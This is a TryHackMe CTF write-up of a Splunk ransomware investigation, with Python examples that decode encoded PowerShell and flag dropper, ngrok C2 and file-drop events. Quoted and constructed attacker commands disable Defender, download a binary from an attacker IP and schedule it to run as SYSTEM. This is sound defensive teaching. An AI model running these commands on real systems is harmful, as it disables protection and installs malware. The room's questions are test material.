Introduction
We used Splunk to investigate ransomware activity on a Windows machine. The ransomware was delivered through PowerShell and encrypted part of the file system. This write-up covers the TryHackMe room PS Eclipse.
Scenario: You are a SOC Analyst for an MSSP (Managed Security Service Provider) company called TryNotHackMe.
A customer sent an email asking for an analyst to investigate the events that occurred on Keegan’s machine on Monday, May 16th, 2022. The client noted that the machine is operational, but some files have a weird file extension. The client is worried that there was a ransomware attempt on Keegan’s device.
Your manager has tasked you to check the events in Splunk to determine what occurred in Keegan’s device.
Scenario
I was playing the role of a SOC analyst for an MSSP called TryNotHackMe. A customer reported suspicious activity on the machine of an employee named Keegan. The machine was still working, but some files had unusual extensions, which immediately made me suspect a ransomware attack. My task was to investigate everything that happened on Keegan's machine on Monday, May 16, 2022.
Investigation Steps using Splunk
1. Initial Data Exploration
I started by searching across all ingested data in Splunk, since no specific index was given. This returned around 17,000 events. I looked at the available fields and picked out the ones that seemed most useful: ComputerName, DestinationIP, DestinationPort, EventCode, FilePath, Image, ProcessName, QueryName, SourceIP, TargetFileName, and User. I noticed two computer names and a single source IP, which I assumed belonged to Keegan's machine. The destination IPs and ports (443 for HTTPS and 80 for HTTP) indicated outbound web traffic, consistent with downloads.
2. Identifying the Suspicious Binary
I homed in on network connections, especially those over port 443 (HTTPS), as they accounted for the most events. I quickly spotted a suspicious executable named "outstanding_gutter.exe" in C:\Windows\Temp, repeatedly associated with one destination IP. To confirm this, I checked events on port 80 (HTTP) and found PowerShell activity. The PowerShell command line arguments contained a base64-encoded string.
3. Decoding the PowerShell Command
I used CyberChef to decode the base64 string. (If the string was passed to powershell.exe via -EncodedCommand, the text under the base64 is UTF-16LE, so "From Base64" has to be followed by "Decode text" with UTF-16LE, otherwise every other character shows as a NUL byte.) The decoded command revealed several critical actions:
- Set-MpPreference -DisableRealtimeMonitoring $true: disables Windows Defender real-time monitoring, a classic move to evade detection.
- wget <IP_address>/outstanding_gutter.exe -OutFile C:\Windows\Temp\outstanding_gutter.exe: downloads outstanding_gutter.exe from the attacker's IP address and saves it to the temp directory. In PowerShell, wget is an alias for Invoke-WebRequest, so the process that performed the download is powershell.exe itself, not a separate wget binary.
- Commands to create and run a scheduled task that executes outstanding_gutter.exe with elevated (SYSTEM) privileges.
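As an added example (not code from the original write-up), here is the decoding step done in Python instead of CyberChef: it takes a powershell.exe command line, finds the encoded-command blob, reverses the UTF-16LE-then-base64 encoding, and pulls out the indicators the room's questions ask for, defanging the download URL in the requested format. The script text, the 203.0.113.10 address (an RFC 5737 test address standing in for the real one) and the command line below are constructed for the sample.

```python
import base64
import binascii
import re

# Added example, not code from the original write-up: decode the base64 blob
# found in powershell.exe's command line and extract the IOCs from it.
# powershell.exe -EncodedCommand takes base64 of the script encoded as
# UTF-16LE, so a plain base64 decode leaves a NUL byte between characters;
# the decoder has to apply UTF-16LE as well.

# Accepts the abbreviations powershell.exe itself accepts (-e, -ec, -enc, ...).
# Whitespace must follow the flag, so -ExecutionPolicy does not match.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)

# Constructed sample of the decoded script. Set-MpPreference is the Defender
# cmdlet that turns off real-time protection; "wget" is PowerShell's alias for
# Invoke-WebRequest. The IP is from the RFC 5737 test range (constructed).
SAMPLE_SCRIPT = (
    "Set-MpPreference -DisableRealtimeMonitoring $true; "
    "wget http://203.0.113.10/outstanding_gutter.exe "
    "-OutFile C:\\Windows\\Temp\\outstanding_gutter.exe; "
    "SCHTASKS /Create /TN OutstandingGutter /TR C:\\Windows\\Temp\\outstanding_gutter.exe "
    "/SC ONSTART /RU SYSTEM /F; "
    "SCHTASKS /Run /TN OutstandingGutter"
)


def encode_for_powershell(script: str) -> str:
    """Build the -EncodedCommand argument the way PowerShell expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded script from a powershell.exe command line, or None if there is none."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # bad padding or not UTF-16LE: not a decodable encoded command


def extract_iocs(script: str) -> dict:
    """Pull out the indicators the investigation needs from the decoded script."""
    def first(pattern):
        m = re.search(pattern, script, re.IGNORECASE)
        return m.group(1) if m else None

    return {
        "defender_realtime_disabled": bool(
            re.search(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", script, re.IGNORECASE)
        ),
        "download_url": first(r"(https?://[^\s;'\"]+)"),
        "dropped_path": first(r"-OutFile\s+([^\s;'\"]+)"),
        "task_name": first(r"SCHTASKS\s+/Create\b.*?/TN\s+([^\s;]+)"),
        "run_as": first(r"/RU\s+([^\s;]+)"),
    }


def defang(url: str) -> str:
    """Defang a URL in the form the room's answer format asks for (hxxp://, [.])."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


# Constructed powershell.exe command line as it would appear in a process
# creation event's CommandLine field.
SAMPLE_COMMAND_LINE = (
    "powershell.exe -ExecutionPolicy Bypass -NoProfile -enc "
    + encode_for_powershell(SAMPLE_SCRIPT)
)

if __name__ == "__main__":
    decoded = decode_encoded_command(SAMPLE_COMMAND_LINE)
    print(decoded)
    iocs = extract_iocs(decoded)
    iocs["download_url"] = defang(iocs["download_url"])
    for key, value in iocs.items():
        print(f"{key}: {value}")
```

The `encode_for_powershell` helper exists only to build the constructed sample; in a real case the blob comes straight from the CommandLine field. The regex deliberately requires whitespace after the flag so that `-ExecutionPolicy` is not mistaken for `-e`, and a blob that fails base64 padding or UTF-16LE decoding returns None rather than raising, so the function can be run over a whole batch of command lines.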
4. Tracing the Binary’s Activity
I then searched for events related to "outstanding_gutter.exe" and looked at the QueryName field, which holds the hostname from DNS query events. This showed the binary resolving a domain ending in ngrok.io, which I identified as the C2 (Command and Control) server. An ngrok tunnel maps a public ngrok.io hostname to a listener on the attacker's own machine, so the hostname rather than the resolved IP is the useful indicator here.
5. Discovering the PowerShell Ransomware Script
My investigation suggested that "outstanding_gutter.exe" wasn't the ransomware itself, but rather a downloader or facilitator. So I searched for PowerShell scripts (.ps1 extension) in the same temp directory. A script named script.ps1 immediately stood out. While the logs didn't explicitly show "outstanding_gutter.exe" downloading script.ps1, the scenario and the script's location strongly implied the connection.
6. Identifying the Actual Ransomware Name
To figure out the true nature of script.ps1, I looked up its hash in the logs. Searching the hash on VirusTotal (a standard step in such investigations) showed the script was detected as "BlackSun". The attacker had simply renamed it to script.ps1 to make it look less suspicious.
7. Finding the Ransom Note and Wallpaper
Finally, I searched for text files (.txt) to locate the ransom note, and indeed a note was found in the temp directory. I then searched for image files (.jpg) and found an image, also in the temp directory, which was likely used to replace the user's desktop wallpaper.
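The pivots from steps 2 through 7, as an added example that is not part of the original write-up: the same checks expressed as detection logic in Python over a handful of constructed Sysmon-style events, with field names as Splunk shows them (EventCode, Image, CommandLine, QueryName, DestinationIp, DestinationPort, TargetFilename). The host name, user, IP address, ngrok hostname and the note/image file names are made up for the sample and are not the room's answers.

```python
import re

# Added example, not code from the original write-up: the investigation's
# pivots as detection rules over constructed Sysmon-style events. Sysmon
# event IDs used: 1 process create, 3 network connect, 11 file create,
# 22 DNS query. All values below are made up for the sample.

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROPPER = r"C:\Windows\Temp\outstanding_gutter.exe"

SAMPLE_EVENTS = [
    # PowerShell launched with an encoded command (blob is a constructed dummy)
    {"EventCode": 1, "Image": PS_IMAGE, "User": "KEEGAN-PC\\keegan",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -enc QUFBQUFBQUFBQUFBQUFBQQ=="},
    # that PowerShell process talking HTTP to a (constructed, RFC 5737) address
    {"EventCode": 3, "Image": PS_IMAGE, "DestinationIp": "203.0.113.10", "DestinationPort": 80},
    # the binary lands in C:\Windows\Temp, written by powershell.exe
    {"EventCode": 11, "Image": PS_IMAGE, "TargetFilename": DROPPER},
    # scheduled task created to run the binary as SYSTEM
    {"EventCode": 1, "Image": r"C:\Windows\System32\schtasks.exe", "User": "KEEGAN-PC\\keegan",
     "CommandLine": "SCHTASKS /Create /TN OutstandingGutter /TR " + DROPPER + " /SC ONSTART /RU SYSTEM /F"},
    # the binary resolving an ngrok tunnel hostname (constructed)
    {"EventCode": 22, "Image": DROPPER, "QueryName": "a1b2c3d4.ngrok.io"},
    # second-stage script and ransomware artefacts written to Temp (names constructed)
    {"EventCode": 11, "Image": DROPPER, "TargetFilename": r"C:\Windows\Temp\script.ps1"},
    {"EventCode": 11, "Image": PS_IMAGE, "TargetFilename": r"C:\Windows\Temp\sample_note.txt"},
    {"EventCode": 11, "Image": PS_IMAGE, "TargetFilename": r"C:\Windows\Temp\sample_wallpaper.jpg"},
    # benign noise that the rules must not flag
    {"EventCode": 22, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "QueryName": "www.mozilla.org"},
    {"EventCode": 1, "Image": PS_IMAGE, "User": "KEEGAN-PC\\keegan",
     "CommandLine": "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\scripts\\inventory.ps1"},
]

# -e/-ec/-enc/-encoded/-encodedcommand followed by a base64-looking blob
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encoded|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.IGNORECASE)
RUN_AS_SYSTEM = re.compile(r"/RU\s+SYSTEM\b", re.IGNORECASE)
TEMP_DIR = r"c:\windows\temp" + "\\"
INTERESTING_EXT = (".exe", ".ps1", ".txt", ".jpg")


def triage(events):
    """Apply the investigation's pivots to a list of events; return (rule, detail) hits in log order."""
    hits = []
    for ev in events:
        code = ev.get("EventCode")
        image = ev.get("Image", "")
        cmd = ev.get("CommandLine", "")
        target = ev.get("TargetFilename", "")
        if code == 1 and image.lower().endswith("powershell.exe") and ENCODED_FLAG.search(cmd):
            hits.append(("encoded_powershell", cmd))
        if code == 1 and image.lower().endswith("schtasks.exe") and RUN_AS_SYSTEM.search(cmd):
            hits.append(("scheduled_task_as_system", cmd))
        if code == 3 and image.lower().endswith("powershell.exe") and ev.get("DestinationPort") in (80, 443):
            hits.append(("powershell_web_connection", f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'))
        if code == 22 and ev.get("QueryName", "").lower().endswith(".ngrok.io"):
            hits.append(("tunnel_dns_query", f'{image} -> {ev["QueryName"]}'))
        if code == 11 and target.lower().startswith(TEMP_DIR) and target.lower().endswith(INTERESTING_EXT):
            hits.append(("temp_file_drop", f"{image} -> {target}"))
    return hits


def writer_of(events, path):
    """Which process wrote a given file (answers 'what executable downloaded the binary')."""
    for ev in events:
        if ev.get("EventCode") == 11 and ev.get("TargetFilename", "").lower() == path.lower():
            return ev.get("Image")
    return None


def dns_queries_from(events, image):
    """Hostnames a given process resolved (the C2 pivot on the QueryName field)."""
    return [ev["QueryName"] for ev in events
            if ev.get("EventCode") == 22 and ev.get("Image", "").lower() == image.lower()]


if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:28} {detail}")
    print("dropper written by:", writer_of(SAMPLE_EVENTS, DROPPER))
    print("dropper resolved:", dns_queries_from(SAMPLE_EVENTS, DROPPER))
```

Each rule corresponds to one Splunk pivot in the narrative: the encoded-command flag on powershell.exe, schtasks with /RU SYSTEM, PowerShell making web connections on 80/443, DNS queries to ngrok.io, and file drops of the interesting extensions under C:\Windows\Temp. The two benign events at the end show the rules stay quiet on an ordinary DNS lookup and on a PowerShell launch without an encoded command.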
Technical Commands Extracted (from the decoded PowerShell script):
Set-MpPreference -DisableRealtimeMonitoring $true
(disables Windows Defender real-time monitoring)
wget <IP_address>/outstanding_gutter.exe -OutFile C:\Windows\Temp\outstanding_gutter.exe
(downloads the binary via PowerShell's wget alias for Invoke-WebRequest and writes it to the temp directory)
SCHTASKS /Create /TN OutstandingGutter /TR C:\Windows\Temp\outstanding_gutter.exe /SC ONSTART /RU SYSTEM /F
(creates a scheduled task that runs the executable with SYSTEM privileges)
SCHTASKS /Run /TN OutstandingGutter
(runs the scheduled task immediately)
In a nutshell, I started by sifting through all the Splunk logs. I noticed a lot of network traffic, especially downloads, and a suspicious file, "outstanding_gutter.exe," caught my attention. By digging into the PowerShell commands, I found a base64-encoded script that, when decoded, showed this executable being downloaded and then set up to run with the highest privileges through a scheduled task. The executable then connected to a command and control server. It turned out that "outstanding_gutter.exe" wasn't the final payload; it appears to have fetched another PowerShell script, script.ps1, which I found in the same temporary folder. By checking its hash, I uncovered its real name: "BlackSun." Finally, I located the ransom note (a text file) and the image file that the ransomware uses to change the desktop wallpaper.
It was a step-by-step process of following the digital breadcrumbs in the logs to piece together exactly how the ransomware attack unfolded.
TryHackMe PS Eclipse Answers
What is the address the binary was downloaded from? Add http:// to your answer & defang the URL.
What Windows executable was used to download the suspicious binary? Enter full path.
What command was executed to configure the suspicious binary to run with elevated privileges?
What permissions will the suspicious binary run as? What was the command to run the binary with elevated privileges? (Format: User + ; + CommandLine)
The suspicious binary connected to a remote server. What address did it connect to? Add http:// to your answer & defang the URL.
A PowerShell script was downloaded to the same location as the suspicious binary. What was the name of the file?
The malicious script was flagged as malicious. What do you think was the actual name of the malicious script?
A ransomware note was saved to disk, which can serve as an IOC. What is the full path to which the ransom note was saved?
The script saved an image file to disk to replace the user’s desktop wallpaper, which can also serve as an IOC. What is the full path of the image?